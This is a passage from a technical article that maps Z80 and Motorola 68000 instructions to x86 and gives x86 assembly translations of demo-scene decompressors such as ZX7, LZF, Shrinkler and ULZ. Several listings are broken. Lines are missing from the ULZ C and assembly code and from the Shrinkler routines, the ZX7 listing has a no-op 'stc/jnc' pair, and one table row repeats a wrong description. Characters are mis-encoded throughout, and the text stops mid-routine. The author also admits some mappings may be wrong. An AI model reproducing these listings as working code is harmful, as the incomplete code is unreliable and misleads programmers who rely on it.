After helping to design microprocessors at Intel (4-Bit 4004, the 8-Bit 8008 and 8080), Ralph Ungermann and Federico Faggin left Intel in 1974 to form Zilog. Masatoshi Shima, who also worked at Intel, would later join the company in 1975 to work on an 8-Bit CPU released in 1976 they called the Z80. The Z80 is essentially a clone of the Intel 8080 with support for more instructions, more registers, and 16-Bit capabilities. Many of the Z80 instructions, to the best of my knowledge, do not have an equivalent on the x86. Proceed with caution, as with no prior experience writing for the Z80, some of the mappings presented here may be incorrect.

Z80 x86 Z80 Description
bit test Perform a bitwise AND, set state flags and discard result.
ccf cmc Inverts/Complements the carry flag.
cp cmp Performs subtraction from A. Sets flags and discards result.
djnz loop Decreases B and jumps to a label if Not Zero. If mapping BC to CX, LOOP works or REP depending on operation.
ex xchg Exchanges two 16-bit values.
exx EXX exchanges BC, DE, and HL with shadow registers with BCβ, DEβ, and HLβ. Unfortunately, nothing like this available for x86. Try to use spare registers or rewrite algorithm to avoid using EXX.
ld mov Load/Copy immediate value or register to another register.
ldi movsb Performs a βLD (DE),(HL)β, then increments DE and HL. Map SI to HL, DI to DE and you can perform the same operation quite easily on x86.
ldir rep movsb Repeats LDI (LD (DE),(HL), then increments DE, HL, and decrements BC) until BC=0. Note that if BC=0 before this instruction is called, it will loop around until BC=0 again.
res btr Reset bit. BTR doesnβt behave exactly the same, but itβs close enough. An alternative might be masking with AND.
rl / rla / rlc / rlca rcl or adc The register is shifted left and the carry flag is put into bit zero of the register. The 7th bit is put into the carry flag. You can perform the same operation using ADC (Add with Carry).
rld Performs a 4-bit leftward rotation of the 12-bit number whose 4 most signigifcant bits are the 4 least significant bits of A, and its 8 least significant bits are in (HL).
rr / rra / r rcr 9-bit rotation to the right. The carry is copied into bit 7, and the bit leaving on the right is copied into the carry.
rra Performs a RR A faster, and modifies the flags differently.
sbc sbb Sum of second operand and carry flag is subtracted from the first operand. Results are written into the first operand.
sla sal
sll/sl1 shl An βundocumentedβ instruction. Functions like sla, except a 1 is inserted into the low bit.
sra sar Arithmetic shift right 1 bit, bit 0 goes to carry flag, bit 7 remains unchanged.
srl shr Like SRA, except a 0 is put into bit 7. The bits are all shifted right, with bit 0 put into the carry flag.

## 10.1 Mega LZ

Designed by the demo group MAYhEM and published in 2005. The original Z80 decoder by fyrex was optimized by Introspec in 2017 while researching 8-Bit compression algorithms. The x86 assembly based on that uses the following register mapping.

Register Mapping
Z80 x86
A AL
B EBX
C ECX
D DH
E DL
HL ESI
DE EDI

The EBX and ECX registers are to replace the B and C registers, respectively, to save a few bytes required for incrementing and decrementing 8-bit registers on x86.

```megalz_depack:
_megalz_depack:

mov    esi, [esp+32+12]  ; esi = inbuf
mov    edi, [esp+32+ 4]  ; edi = outbuf

call   init_get_bit

jnz    exit_get_bit      ; ret nz
lodsb                    ; ld a, (hl)
; inc hl
exit_get_bit:
ret                      ; ret
init_get_bit:
pop    ebp               ;
mov    al, 128           ; ld a, 128
mlz_literal:
movsb                    ; ldi
mlz_main:
call   ebp               ; GET_BIT
jc     mlz_literal       ; jr c, mlz_literal
xor    edx, edx
mov    dh, -1            ; ld d, #FF
xor    ebx, ebx          ; ld bc, 2
push   2
pop    ecx
call   ebp               ; GET_BIT
jc     CASE01x           ; jr c, CASE01x
call   ebp               ; GET_BIT
jc     mlz_short_ofs     ; jr c, mlz_short_ofs
CASE000:
dec    ecx               ; dec c
mov    dl, 63            ; ld e, %00111111
call   ebp               ; GET_BIT
adc    dl, dl            ; rl e
mlz_copy_bytes:
push   esi               ; push hl
movsx  edx, dx           ; sign-extend dx to 32-bits
lea    esi, [edi+edx]    ;
rep    movsb             ; ldir
pop    esi               ; pop hl
jmp    mlz_main          ; jr mlz_main
CASE01x:
call   ebp               ; GET_BIT
jnc    CASE010           ; jr nc, CASE010
dec    ecx               ; dec c
call   ebp               ; GET_BIT
inc    ebx               ; inc b
call   ebp               ; GET_BIT
adc    cl, cl            ; rl c
jc     mlz_exit          ; jr c, mlz_exit
inc    ecx               ; inc c
CASE010:
inc    ecx               ; inc c
call   ebp               ; GET_BIT
jnc    mlz_short_ofs     ; jr nc, mlz_short_ofs
mov    dh, 31            ; ld d, %00011111
mlz_long_ofs:
call   ebp               ; GET_BIT
adc    dh, dh            ; rl d
jnc    mlz_long_ofs      ; jr nc, mlz_long_ofs
dec    edx               ; dec d
mlz_short_ofs:
mov    dl, [esi]         ; ld e, (hl)
inc    esi               ; inc hl
jmp    mlz_copy_bytes    ; jr mlz_copy_bytes
mlz_exit:
sub    edi, [esp+32+4]
mov    [esp+28], edi     ; eax = decompressed length
ret
```

## 10.2 ZX7

Designed by Einar Saukas and published in 2012. ZX7 is an optimal LZ77 algorithm for the ZX-Spectrum using a combination of fixed length and variable length Gamma codes for the match length and offset. The following is a translation of the standard Z80 depacker to a 32-bit x86 assembly in 111 bytes.

Register Mapping
Z80 x86
A AL
B CH
C CL
BC CX
D DH
E DL
HL ESI
DE EDX or EDI
```dzx7_standard:
_dzx7_standard:

; tested on Windows
mov    esi, [esp+32+12]     ; hl = source
mov    edi, [esp+32+ 4]     ; de = destination

mov    al, 0x80             ; ld      a, \$80
dzx7s_copy_byte_loop:
; copy literal byte
movsb                       ; ldi
dzx7s_main_loop:
call   dzx7s_next_bit       ; call    dzx7s_next_bit
; next bit indicates either literal or sequence
jnc    dzx7s_copy_byte_loop ; jr      nc, dzx7s_copy_byte_loop

; determine number of bits used for length (Elias gamma coding)
push   edi                  ; push    de
mov    ecx, 0               ; ld      bc, 0
mov    dh, ch               ; ld      d, b
dzx7s_len_size_loop:
inc    dh                   ; inc     d
call   dzx7s_next_bit       ; call    dzx7s_next_bit
jnc    dzx7s_len_size_loop  ; jr      nc, dzx7s_len_size_loop
; determine length
dzx7s_len_value_loop:
jc     skip_call
call   dzx7s_next_bit       ; call    nc, dzx7s_next_bit
skip_call:
rcl    cl, 1                ; rl      c
rcl    ch, 1                ; rl      b
; check end marker
jc     dzx7s_exit           ; jr      c, dzx7s_exit
dec    dh                   ; dec     d
jnz    dzx7s_len_value_loop ; jr      nz, dzx7s_len_value_loop
inc    cx                   ; inc     bc

; determine offset
; load offset flag (1 bit) + offset value (7 bits)
mov    dl, [esi]            ; ld      e, (hl)
inc    esi                  ; inc     hl
; opcode for undocumented instruction "SLL E" aka "SLS E"
shl    dl, 1                ; defb    \$cb, \$33
; if offset flag is set, load 4 extra bits
jnc    dzx7s_offset_end     ; jr      nc, dzx7s_offset_end
; bit marker to load 4 bits
mov    dh, 0x10             ; ld      d, \$10
dzx7s_rld_next_bit:
call   dzx7s_next_bit       ; call    dzx7s_next_bit
; insert next bit into D
rcl    dh, 1                ; rl      d
; repeat 4 times, until bit marker is out
jnc    dzx7s_rld_next_bit   ; jr      nc, dzx7s_rld_next_bit
inc    dh                   ; inc     d
; retrieve fourth bit from D
shr    dh, 1                ; srl	d
dzx7s_offset_end:
; insert fourth bit into E
rcr    dl, 1                ; rr      e

; copy previous sequence
; store source, restore destination
xchg   esi, [esp]           ; ex      (sp), hl
; store destination
push   esi                  ; push    hl
; HL = destination - offset - 1
sbb    esi, edx             ; sbc     hl, de
; DE = destination
pop    edi                  ; pop     de
rep    movsb                ; ldir
dzx7s_exit:
pop    esi                  ; pop     hl
jnc    dzx7s_main_loop      ; jr      nc, dzx7s_main_loop
sub    edi, [esp+32+4]
mov    [esp+28], edi
ret
dzx7s_next_bit:
; check next bit
; no more bits left?
jnz    exit_get_bit         ; ret     nz
; load another group of 8 bits
mov    al, [esi]            ; ld      a, (hl)
inc    esi                  ; inc     hl
rcl    al, 1                ; rla
exit_get_bit:
ret                         ; ret
```

The following is a 32-Bit version of a size-optimized 16-bit code implemented by Trixter and Qkumba in 2016. Itβs currently 81 bytes.

```zx7_depack:
_zx7_depack:
mov    edi, [esp+32+ 4] ; output
mov    esi, [esp+32+12] ; input

call   init_get_bit
add    al, al           ; check next bit
jnz    exit_get_bit     ; no more bits left?
lodsb                   ; load another group of 8 bits
exit_get_bit:
ret
init_get_bit:
pop    ebp
mov    al, 80h
xor    ecx, ecx
copy_byte:
movsb                    ; copy literal byte
main_loop:
call   ebp
jnc    copy_byte         ; next bit indicates either
; literal or sequence
; determine number of bits used for length (Elias gamma coding)
xor    ebx, ebx
len_size_loop:
inc    ebx
call   ebp
jnc    len_size_loop
jmp    len_value_skip
; determine length
len_value_loop:
call   ebp
len_value_skip:
jc     zx7_exit       ; check end marker

dec    ebx
jnz    len_value_loop

; determine offset
mov    bl, [esi]      ; load offset flag (1 bit) +
; offset value (7 bits)
inc    esi
stc
jnc    offset_end     ; if offset flag is set, load
; 4 extra bits
mov    bh, 10h        ; bit marker to load 4 bits
rld_next_bit:
call   ebp
adc    bh, bh         ; insert next bit into D
jnc    rld_next_bit   ; repeat 4 times, until bit
; marker is out
inc    bh             ; add 256 to DE
offset_end:
shr    ebx, 1         ; insert fourth bit into E
push   esi
mov    esi, edi
sbb    esi, ebx       ; destination = destination - offset - 1
rep    movsb
pop    esi            ; restore source address
jmp    main_loop
zx7_exit:
sub    edi, [esp+32+4]
mov    [esp+28], edi
ret
```

## 10.3 ZX7 Mini

Designed by Antonio Villena and published in 2019. This version uses less code at the expense of the compression ratio. Nevertheless, itβs a great example to demonstrate the conversion between Z80 and x86.

Register Mapping
Z80 x86
A AL
BC ECX
D DH
E DL
HL ESI
DE EDI
```zx7_depack:
_zx7_depack:

mov    esi, [esp+32+4] ; esi = in
mov    edi, [esp+32+8] ; edi = out

call   init_getbit
getbit:
jnz    exit_getbit     ; ret     nz
lodsb                  ; ld      a, (hl)
; inc     hl
exit_getbit:
ret
init_getbit:
pop    ebp             ;
mov    al, 80h         ; ld      a, \$80
copyby:
movsb                  ; ldi
mainlo:
call   ebp             ; call    getbit
jnc    copyby          ; jr      nc, copyby
push   1               ; ld      bc, 1
pop    ecx
lenval:
call   ebp             ; call    getbit
rcl    cl, 1           ; rl      c
jc     exit_depack     ; ret     c
call   ebp             ; call    getbit
jnc    lenval          ; jr      nc, lenval
push   esi             ; push    hl
movzx  edx, byte[esi]  ; ld      l, (hl)
mov    esi, edi
sbb    esi, edx        ; sbc     hl, de
rep    movsb           ; ldir
pop    esi             ; pop     hl
inc    esi             ; inc     hl
jmp    mainlo          ; jr      mainlo
exit_depack:
sub    edi, [esp+32+8] ;
mov    [esp+28], edi
ret
```

## 10.4 LZF

Designed by Ilya Muravyov and published here in 2013. The x86 assembly is a translation of a size-optimized version by introspec. The compressor is closed, so this is another example to demonstrate the conversion between Z80 and x86.

```lzf_depack:
_lzf_depack:
mov    edi, [esp+32+4]   ; edi = outbuf
mov    esi, [esp+32+8]   ; esi = inbuf

xor    ecx, ecx          ; ld b,0
jmp    MainLoop          ; jr MainLoop  ; all copying is done by LDIR; B needs to be zero
ProcessMatches:
push   eax               ; exa
lodsb                    ; ld a,(hl)
; inc hl
; rlca
; rlca
rol    al, 3             ; rlca
inc    al                ; inc a
and    al, 00000111b     ; and %00000111
jnz    CopyingMatch      ; jr nz,CopyingMatch
LongMatch:
lodsb                    ; ld a,(hl)
; inc hl ; len == 9 means an extra len byte needs to be read
; jr nc,CopyingMatch
; inc b
CopyingMatch:
mov    cl, al            ; ld c,a
inc    ecx               ; inc bc
pop    eax               ; exa
cmp    al, 20h           ; token == #20 suggests a possibility of the end marker (#20,#00)
jnz    NotTheEnd         ; jr nz,NotTheEnd
xor    al, al            ; xor a
cmp    [esi], al         ; cp (hl)
jz     exit              ; ret z   ; is it the end marker? return if it is
NotTheEnd:
and    al, 1fh           ; and %00011111 ; A' = high(offset); also, reset flag C for SBC below
push   esi               ; push hl
movzx  edx, byte[esi]    ; ld l,(hl)
mov    dh, al            ; ld h,a                ; HL = offset
movsx  edx, dx           ;
; push de
mov    esi, edi          ; ex de,hl              ; DE = offset, HL = dest
sbb    esi, edx          ; sbc hl,de             ; HL = dest-offset
; pop de
rep    movsb             ; ldir
pop    esi               ; pop hl
inc    esi               ; inc hl
MainLoop:
mov    al, [esi]         ; ld a,(hl)
cmp    al, 20h           ; cp #20
jnc    ProcessMatches    ; jr nc,ProcessMatches  ; tokens "000lllll" mean "copy lllll+1 literals"
inc    al                ; inc a
mov    cl, al            ; ld c,a
inc    esi               ; inc hl
rep    movsb             ; ldir   ; actual copying of the literals
jmp    MainLoop          ; jr MainLoop
exit:
sub    edi, [esp+32+4]
mov    [esp+28], edi
ret
```

## 11. Motorola 68000 (68K)

βMotorola, with its superior technology, lost the single most important design contest of the last 50 yearsβ Walden C. Rhines

A revolutionary CPU released in 1979 that includes eight 32-Bit general-purpose data registers (D0-D7), and eight address registers (A0-A7) used for function arguments and stack pointer. The 68K was used in the Commodore Amiga, the Atari ST, the Macintosh, including various fourth-generation gaming consoles like the Sega Megadrive, and arcade systems like Namco System 2. The 68K was more compelling than the Z80, 6502, 8088, and 8086, so why did it lose to Intel in the home computer war of the 1980s? A history of the Amiga, part 10: The downfall of Commodore offers some plausible answers. IBM choosing Control Program/Monitor by Gary Kildall for its 1980 PC operating system is also likely a factor.

The following table lists some 68K instructions and the x86 instructions used to replace them.

68K x86 Description
move mov Copy data from source to destination
sub sub Subtract binary.
subx sbb Subtract with borrow/carry.
rts ret Return from subroutine.
dbf/dbt loopne/loope Test condition, decrement, and branch.
bsr call Branch to subroutine
bcs:bcc jc:jnc Branch/Jump if carry set. Jump if carry clear.
beq:bne je:jne Branch/Jump if equal. Not equal.
ble jle Branch/Jump if less than or equal.
bra jmp Branch always.
lsr shr Logical shift right.
lsl shl Logical shift left.
bhs jae Branch on higher than or same.
bpl jns Branch on higher than or same.
bmi js Branch on minus. Jump if signed.
tst test Test bit zero of a register.
exg xchg Exchange registers.

## 11.1 PackFire

Designed by neural and published in 2010, PackFire comprises two algorithms tailored for demos targeting the Atari ST. The first borrows ideas from Exomizer and is suitable for small files not exceeding ~40KB. The other borrows ideas from LZMA, which is more suited to compressing larger files. The LZMA-variant requires 16KB of RAM for the range decoder, which isnβt a problem for the Atari ST with between 512-1024KB of RAM available. However, translating code written for the 68K to x86 isnβt easy because the x86 is a less advanced architecture. Since being released, badc0de has published decoders for a variety of other architectures, including 32-Bit ARM. The following is the Exomizer-style decoder for files not exceeding ~40KB, which probably isnβt very useful unless you write demos for retro hardware.

```packfire_depack:
_packfire_depack:

mov    ebp, [esp+32+4]   ; eax = inbuf (a0)
mov    edi, [esp+32+8]   ; edi = outbuf (a1)

lea    esi, [ebp+26]     ; lea     26(a0),a2
lodsb                    ; move.b  (a2)+,d7
lit_copy:
movsb                    ; move.b  (a2)+,(a1)+
main_loop:
call   get_bit           ; bsr.b   get_bit
jc     lit_copy          ; bcs.b   lit_copy

cdq                      ; moveq   #-1,d3
dec    edx
get_index:
call   get_bit           ; bsr.b   get_bit
jnc    get_index         ; bcc.b   get_index

cmp    edx, 0x10         ; cmp.w   #\$10,d3
je     depack_stop       ; beq.b   depack_stop

call   get_pair          ; bsr.b   get_pair
push   edx               ; move.w  d3,d6 ; save it for the copy
cmp    edx, 2            ; cmp.w   #2,d3
jle    out_of_range      ; ble.b   out_of_range

cdq                      ; moveq   #0,d3
out_of_range:
; move.b  table_len(pc,d3.w),d1
; move.b  table_dist(pc,d3.w),d0
; code without tables
push   4                 ; d1 = 4
pop    ecx
push   16                ; d0 = 16
pop    ebx
dec    edx               ; d3--
js     L0

dec    edx
mov    cl, 2             ; d1 = 2
mov    bl, 48            ; d0 = 48
js     L0

mov    cl, 4             ; d1 = 4
mov    bl, 32            ; d0 = 32
L0:
call   get_bits          ; bsr.b   get_bits
call   get_pair          ; bsr.b   get_pair
pop    ecx
push   esi
mov    esi, edi          ; move.l  a1,a3
sub    esi, edx          ; sub.l   d3,a3
copy_bytes:
rep    movsb             ; move.b  (a3)+,(a1)+
; subq.w  #1,d6
; bne.b   copy_bytes
pop    esi
jmp    main_loop         ; bra.b   main_loop
get_pair:
cdq                      ; sub.l   a6,a6
; moveq   #\$f,d2
calc_len_dist:
mov    ebx, edx          ; move.w  a6,d0
and    ebx, 15           ; and.w   d2,d0
jne    node              ; bne.b   node
push   1
pop    edi               ; moveq   #1,d5
node:
mov    eax, edx          ; move.w  a6,d4
shr    eax, 1            ; lsr.w   #1,d4
mov    cl, [ebp+eax]     ; move.b  (a0,d4.w),d1
push   1                 ; moveq   #1,d4
pop    eax
and    ebx, eax          ; and.w   d4,d0
je     nibble            ; beq.b   nibble
shr    ecx, 4            ; lsr.b   #4,d1
nibble:
mov    ebx, edi          ; move.w  d5,d0
and    ecx, 15           ; and.w   d2,d1
shl    eax, cl           ; lsl.l   d1,d4

; dbf  d3,calc_len_dist
jns    calc_len_dist
; save d0 and d1
get_bits:
cdq                      ; moveq   #0,d3
getting_bits:
dec    ecx               ; subq.b  #1,d1
jns    cont_get_bit      ; bhs.b   cont_get_bit
ret
depack_stop:
sub    edi, [esp+32+8]   ;
ret                      ; rts
cont_get_bit:
call   get_bit           ; bsr.b   get_bit
jmp    getting_bits      ; bra.b   getting_bits
get_bit:
jne    byte_done         ; bne.b   byte_done
lodsb                    ; move.b  (a2)+,d7
byte_done:
ret                      ; rts
```

## 11.2 Shrinkler

Designed by Aske Simon Christensen (Blueberry/Loonies) and published in 1999. It stores compressed data in Big-Endian 32-bit words, and the x86 translation must use BSWAP before reading bits of the stream. The compressor is open source and could be updated to use Little-Endian format instead. Christensen is also a co-author of the Crinkler executable compressor along with Rune Stubbe (Mentor/TBC) thatβs popular for 4K intros on Windows.

The following is a description from Blueberry:

Shrinkler is optimized for target sizes around 4k (while still being good for 64k), which strongly favors decompression code size. It tries to achieve the best size for this target, somewhat at the expense of decompression speed. At the same time, it is intended to be useful on Amiga 500, which means that decompression speed should still be reasonable, and decompression memory usage should be small. Shrinkler decrunches a 64k intro in typically less than half a minute on Amiga 500, which is an acceptable wait time for starting an intro. And the memory needed for the probabilities fits within the default stack size of 4k on Amiga.

Shrinkler also has special tweaks gearing it towards 16-bit oriented data (as all 68000 instructions are a multiple of 16 bits). Specifically, it keeps separate literal context groups for even and odd bytes, since these distributions are usually very different for Amiga data. Same thing for the flag indicating whether the a literal or a match is coming up. This gives a great boost for Amiga intros, but it has no benefit for data that has arbitrary alignment. It usually doesnβt hurt either, except for the slight cost in decompression code size.

The following is a translation of the 68K assembly to x86, with help from Blueberry.

```    %define INIT_ONE_PROB       0x8000
%define SINGLE_BIT_CONTEXTS 1
%define NUM_CONTEXTS        1536

.edi resd 1
.esi resd 1
.ebp resd 1
.esp resd 1
.ebx resd 1
.edx resd 1
.ecx resd 1
.eax resd 1
endstruc

; temporary variables for range decoder
%define d2   4*0
%define d3   4*1
%define d4   4*2
%define prob 4*3

%ifndef BIN
global ShrinklerDecompress
global _ShrinklerDecompress
%endif

ShrinklerDecompress:
_ShrinklerDecompress:
; save d2-d7/a4-a6 in -(a7) the stack

; esi = inbuf
mov    esi, [esp+32+4]   ; move.l a0,a4
; edi = outbuf
mov    edi, [esp+32+8]   ; move.l a1,a5
; move.l a1,a6
; allocate local memory for range decoder
sub    esp, 4096
test   [esp], esp        ; stack probe
mov    ebp, esp          ; ebp = stack pointer

; Init range decoder state
mov    dword[ebp+d2], 0  ; moveq.l  #0,d2
mov    dword[ebp+d3], 1  ; moveq.l  #1,d3
mov    dword[ebp+d4], 1  ; moveq.l  #1,d4
ror    dword[ebp+d4], 1  ; ror.l  #1,d4

; Init probabilities
mov    edx, NUM_CONTEXTS ; move.l #NUM_CONTEXTS, d6
.init:
; move.w  #INIT_ONE_PROB,-(a7)
mov    word[prob+ebp+edx*2-2], INIT_ONE_PROB
sub    dx, 1             ; subq.w #1,d6
jne    .init             ; bne.b  .init
; D6 = 0
.lit:
; Literal
.getlit:
call   GetBit            ; bsr.b  GetBit
jnc    .getlit           ; bcc.b  .getlit

mov    [edi], dl         ; move.b d6,(a5)+
inc    edi
; bsr.b  ReportProgress
.switch:
; After literal
call   GetKind           ; bsr.b  GetKind
jnc    .lit              ; bcc.b  .lit
; Reference
mov    edx, -1           ; moveq.l  #-1,d6
call   GetBit            ; bsr.b  GetBit
mov    edx, 4            ; moveq.l  #4,d6
call   GetNumber         ; bsr.b  GetNumber
.copyloop:
mov    al, [edi + ebx]   ; move.b (a5,d5.l),(a5)+
stosb
sub    ecx, 1            ; subq.l #1,d7
jne    .copyloop         ; bne.b  .copyloop
; bsr.b  ReportProgress
; After reference
call   GetKind           ; bsr.b  GetKind
jnc    .lit              ; bcc.b  .lit
mov    edx, 3            ; moveq.l  #3,d6
call   GetNumber         ; bsr.b  GetNumber
mov    ebx, 2            ; moveq.l  #2,d5
sub    ebx, ecx          ; sub.l  d7,d5

add    esp, 4096         ; lea.l  NUM_CONTEXTS*2(a7),a7
sub    edi, [esp+32+8]
ret                      ; rts

ReportProgress:
; move.l  a2,d0
; beq.b .nocallback
; move.l  a5,d0
; sub.l a6,d0
; move.l  a3,a0
; jsr (a2)
.nocallback:
; rts

GetKind:
; Use parity as context
; move.l a5,d1
mov    edx, 1            ; moveq.l  #1,d6
and    edx, edi          ; and.l  d1,d6
shl    dx, 8             ; lsl.w  #8,d6
jmp    GetBit            ; bra.b  GetBit

GetNumber:
; EDX = Number context
; Out: Number in ECX
shl    dx, 8             ; lsl.w  #8,d6
.numberloop:
call   GetBit            ; bsr.b  GetBit
jc     .numberloop       ; bcs.b  .numberloop
mov    ecx, 1            ; moveq.l  #1,d7
sub    dl, 1             ; subq.b #1,d6
.bitsloop:
call   GetBit            ; bsr.b  GetBit
sub    dl, 2             ; subq.b #2,d6
jnc    .bitsloop         ; bcc.b  .bitsloop
ret                      ; rts

; EDX = Bit context

; d2 = Range value
; d3 = Interval size
; d4 = Input bit buffer

; Out: Bit in C and X
mov    eax, [ebp+d4]
jne    nonewword         ; bne.b  nonewword
lodsd                    ; move.l (a4)+,d4
bswap  eax               ; data is stored in big-endian format
nonewword:
mov    [ebp+d4], eax
jmp    check_interval
GetBit:
mov    ebx, [ebp+d2]
mov    ecx, [ebp+d3]
check_interval:
test   cx, cx            ; tst.w  d3

; lea.l 4+SINGLE_BIT_CONTEXTS*2(a7,d6.l),a1
lea    edi, [ebp+prob+2*edx+SINGLE_BIT_CONTEXTS*2]
movzx  eax, word[edi]    ; move.w (a1),d1
; D1/EAX = One prob

sub    [edi], ax         ; sub.w  d1,(a1)

mul    cx                ; mulu.w d3,d1
; swap.w d1

sub    bx, dx            ; sub.w  d1,d2
jb     .one              ; blo.b  .one
.zero:
; oneprob = oneprob * (1 - adjust) = oneprob - oneprob * adjust
sub    cx, dx            ; sub.w  d1,d3
; 0 in C and X
; rts
jmp    exit_get_bit
.one:
; onebrob = 1 - (1 - oneprob) * (1 - adjust) = oneprob - oneprob * adjust + adjust
mov    cx, dx            ; move.w d1,d3
; 1 in C and X
exit_get_bit:
mov    word[ebp+d2], bx
mov    word[ebp+d3], cx
ret                      ; rts
```

The following is my own attempt to implement a size-optimized version of the same depacker in x86 assembly. However, thereβs likely room for improvement here, and this code will be updated later.

```    %define INIT_ONE_PROB       0x8000
%define SINGLE_BIT_CONTEXTS 1
%define NUM_CONTEXTS        1536

.edi resd 1
.esi resd 1
.ebp resd 1
.esp resd 1
.ebx resd 1
.edx resd 1
.ecx resd 1
.eax resd 1
endstruc

struc shrinkler_ctx
.esp      resd 1      ; original value of esp before allocation
.range    resd 1      ; range value
.ofs      resd 1
.interval resd 1      ; interval size
endstruc

bits 32

%ifndef BIN
global shrinkler_depackx
global _shrinkler_depackx
%endif

shrinkler_depackx:
_shrinkler_depackx:
mov    ebx, [esp+32+4]   ; edi = outbuf
mov    esi, [esp+32+8]   ; esi = inbuf

mov    eax, esp
xor    ecx, ecx          ; ecx = 4096
mov    ch, 10h
sub    esp, ecx          ; subtract 1 page
test   [esp], esp        ; stack probe

mov    edi, esp
stosd                    ; save original value of esp
cdq
xchg   eax, edx
stosd                    ; range value = 0
stosd                    ; offset = 0
inc    eax
stosd                    ; interval length = 1

call   init_get_bit
GetBit:
mov    ebp, [ebx+shrinkler_ctx.range   ]
mov    ecx, [ebx+shrinkler_ctx.interval]
jmp    check_interval
jne    nonewword
lodsb
nonewword:
check_interval:
test   cx, cx

lea    edi, [shrinkler_ctx_size + ebx + 2*edx + SINGLE_BIT_CONTEXTS*2]
mov    ax, word[edi]

sub    [edi], ax

cdq
mul    cx

sub    ebp, edx
jc    .one
.zero:
; oneprob = oneprob * (1 - adjust) = oneprob - oneprob * adjust
sub    ecx, edx
; 0 in C and X
jmp    exit_getbit
.one:
; onebrob = 1 - (1 - oneprob) * (1 - adjust) = oneprob - oneprob * adjust + adjust
xchg   edx, ecx
; 1 in C and X
exit_getbit:
mov    [ebx+shrinkler_ctx.range   ], ebp
mov    [ebx+shrinkler_ctx.interval], ecx
ret
GetKind:
; Use parity as context
mov    edx, edi
and    edx, 1
shl    edx, 8
jmp    ebp
GetNumber:
cdq
.numberloop:
inc    edx
inc    edx
call   ebp
jc    .numberloop
push   1
pop    ecx
dec    edx
.bitsloop:
call   ebp
sub    dl, 2
jnc   .bitsloop
ret

init_get_bit:
pop    ebp               ; ebp = GetBit

; Init probabilities
mov    ch, NUM_CONTEXTS >> 8
xor    eax, eax
mov    ah, 1<<7
rep    stosw
xchg   al, ah

mov    edi, ebx
mov    ebx, esp

; edx = 0
cdq
.lit:
; Literal
inc    edx
.getlit:
call   ebp
jnc    .getlit

mov    [edi], dl
inc    edi
.switch:
; After literal
call   GetKind
jnc    .lit

; Reference
cdq
dec    edx
call   ebp
clc
call   GetNumber
push   esi
mov    esi, edi
rep    movsb
pop    esi

; After reference
call   GetKind
jnc   .lit
stc
call   GetNumber
neg    ecx
inc    ecx
inc    ecx
mov    [ebx+shrinkler_ctx.ofs], ecx

; return depacked length
mov    esp, [ebx+shrinkler_ctx.esp]
sub    edi, [esp+32+4]
ret
```

## 12. C/x86 assembly

The following algorithms were translated from C to x86 assembly or were already implemented in x86 assembly and optimized for size.

## 12.1 Lempel-Ziv Ross Williams (LZRW)

Designed by Ross Williams and described in An Extremely Fast Ziv-Lempel Data Compression Algorithm published in 1991. The compression ratio is only slightly worse than LZ77 but is much faster at compression.

```lzrw1_depack:
_lzrw1_depack:
lea    esi, [esp+32+4]
lodsd
xchg   edi, eax        ; edi = outbuf
lodsd
xchg   ebp, eax        ; ebp = inlen
lodsd
xchg   esi, eax        ; esi = inbuf
add    ebp, esi        ; ebp = inbuf + inlen
L0:
push   16 + 1          ; bits = 16
pop    edx
lodsw                  ; ctrl = *in++, ctrl |= (*in++) << 8
xchg   ebx, eax
L1:
; while(in != end) {
cmp    esi, ebp
je     L4
; if(--bits == 0) goto L0
dec    edx
jz     L0
L2:
; if(ctrl & 1) {
shr    ebx, 1
jc     L3
movsb                  ; *out++ = *in++;
jmp    L1
L3:
lodsb                  ; ofs = (*in & 0xF0) << 4
aam    16
cwde
movzx  ecx, al
inc    ecx
lodsb                  ; ofs |= *in++ & 0xFF;
push   esi             ; save pointer to in
mov    esi, edi        ; ptr  = out - ofs;
sub    esi, eax
rep    movsb           ; while(len--) *out++ = *ptr++;
pop    esi             ; restore pointer to in
jmp    L1
L4:
sub    edi, [esp+32+4] ; edi = out - outbuf
mov    [esp+28], edi   ; esp+_eax = edi
ret
```

## 12.2 Ultra-fast LZ (ULZ)

Ultra-fast LZ was first published by Ilya βencodeβ Muravyov in 2010 and then appears to have been open sourced in 2019. The following code is a straightforward translation of the C decoder to x86 assembly.

```static uint32_t add_mod(uint32_t x, uint8_t** p);

uint32_t ulz_depack(
void *outbuf,
uint32_t inlen,
const void *inbuf)
{
uint8_t  *ptr, *in, *end, *out;
uint32_t dist, len;
uint8_t  token;

out = (uint8_t*)outbuf;
in  = (uint8_t*)inbuf;
end = in + inlen;

while(in < end) {
token = *in++;
if(token >= 32) {
len = token >> 5;
if(len == 7)
while(len--) *out++ = *in++;
if(in >= end) break;
}
len = (token & 15) + 4;
if(len == (15 + 4))
dist = ((token & 16) << 12) + *(uint16_t*)in;
in += 2;
ptr = out - dist;
while(len--) *out++ = *ptr++;
}
return (uint32_t)(out - (uint8_t*)outbuf);
}

static uint32_t add_mod(uint32_t x, uint8_t** p) {
uint8_t c, i;

for(i=0; i<=21; i+=7) {
c = *(*p)++;
x += (c << i);
if(c < 128) break;
}
return x;
}
```
```ulz_depack:
_ulz_depack:
lea    esi, [esp+32+4]
lodsd
xchg   edi, eax          ; edi = outbuf
lodsd
xchg   ebx, eax
lodsd
xchg   esi, eax          ; esi = inbuf
add    ebx, esi          ; ebx += inbuf
ulz_main:
xor    ecx, ecx
mul    ecx
; while (in < end) {
cmp    esi, ebx
jnb    ulz_exit
; token = *in++;
lodsb
; if(token >= 32) {
cmp    al, 32
jb     ulz_copy2
; len = token >> 5
mov    cl, al
shr    cl, 5
; if(len == 7)
cmp    cl, 7
jne    ulz_copy1
ulz_copy1:
; while(len--) *out++ = *in++;
rep    movsb
; if(in >= end) break;
cmp    esi, ebx
jae    ulz_exit
ulz_copy2:
; len = (token & 15) + 4;
mov    cl, al
and    cl, 15
; if(len == (15 + 4))
cmp    cl, 15 + 4
jne    ulz_copy3
ulz_copy3:
; dist = ((token & 16) << 12) + *(uint16_t*)in;
and    al, 16
shl    eax, 12
xchg   eax, edx
; eax = *(uint16_t*)in;
; in += 2;
lodsw
; p = out - dist
push   esi
mov    esi, edi
sub    esi, edx
; while(len--) *out++ = *p++;
rep    movsb
pop    esi
jmp    ulz_main
; }
ulz_exit:
; return (uint32_t)(out - (uint8_t*)outbuf);
sub    edi, [esp+32+8]
mov    [esp+28], edi
ret

; static uint32_t add_mod(uint32_t x, uint8_t** p);
push   eax               ; save eax
xchg   eax, ecx          ; eax = len
xor    ecx, ecx          ; i = 0
am_loop:
mov    dl, byte[esi]     ; c = *(*p)++
inc    esi
push   edx               ; save c
